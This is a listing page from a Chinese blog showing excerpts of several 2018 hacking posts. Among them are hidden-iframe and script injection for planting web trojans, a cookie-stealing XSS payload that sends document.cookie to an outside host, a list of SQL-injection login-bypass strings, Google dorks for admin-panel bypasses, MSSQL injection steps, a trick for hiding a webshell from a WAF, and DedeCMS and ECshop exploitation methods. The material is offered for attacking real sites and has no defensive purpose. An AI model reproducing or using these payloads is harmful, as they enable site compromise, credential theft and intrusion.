摘要:
Web网页中挂马的方法 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:j 阅读全文
posted @ 2018-07-18 10:54
圆柱模板
阅读(322)
评论(0)
推荐(0)
摘要:
在CMD 输入 nslookup 域名 例如:nslookup www.baidu.com有CDN的示例Server: cache3-gzAddress: 211.98.4.1Non-authoritative answer:Name: www.baidu.comAddresses: 119.75. 阅读全文
posted @ 2018-07-18 10:49
圆柱模板
阅读(234)
评论(0)
推荐(0)
摘要:
漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表 阅读全文
posted @ 2018-07-18 10:47
圆柱模板
阅读(463)
评论(0)
推荐(0)
摘要:
保存为cookie.asp 利用代码: <script>window.open('http://zhimo.yuanzhumuban.cc/cookie.asp?msg='+document.cookie)</script> 阅读全文
posted @ 2018-07-18 10:41
圆柱模板
阅读(1422)
评论(0)
推荐(0)
摘要:
asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1' 阅读全文
posted @ 2018-07-18 10:39
圆柱模板
阅读(2472)
评论(0)
推荐(0)
摘要:
我们在Google中搜索关键词 关键字:inurl:szwyadmin/login.asp 任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码: 代码: 关闭此页面 在次打开登录界面 在地址栏中将login.asp改为admin_index.asp 就直接进入后台了 另外还可以试试 ewe 阅读全文
posted @ 2018-07-18 10:36
圆柱模板
阅读(721)
评论(0)
推荐(0)
摘要:
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统;and (select count(*) f 阅读全文
posted @ 2018-07-18 10:35
圆柱模板
阅读(316)
评论(0)
推荐(0)
摘要:
很多拿站的朋友,都知道大马很多都会被安全狗拦截,最近一个大牛给我一个方法,竟然成功,所以分享下这个方法。 将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入:<!–#include file=”dama.txt”–> ,保存为X.asp,两个文件传同目录下,访问u 阅读全文
posted @ 2018-07-18 10:33
圆柱模板
阅读(990)
评论(0)
推荐(0)
摘要:
昨晚上翻阅一本技术书籍中,找到灵感,发现的ECshop漏洞。 搜索关键字:关键字:powered by ecshop 方法一: 普通代码: 变种代码: 直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。 拿shell方法很简单,找到“库项目管理”再选择“配送 阅读全文
posted @ 2018-07-18 10:15
圆柱模板
阅读(7166)
评论(2)
推荐(0)

浙公网安备 33010602011771号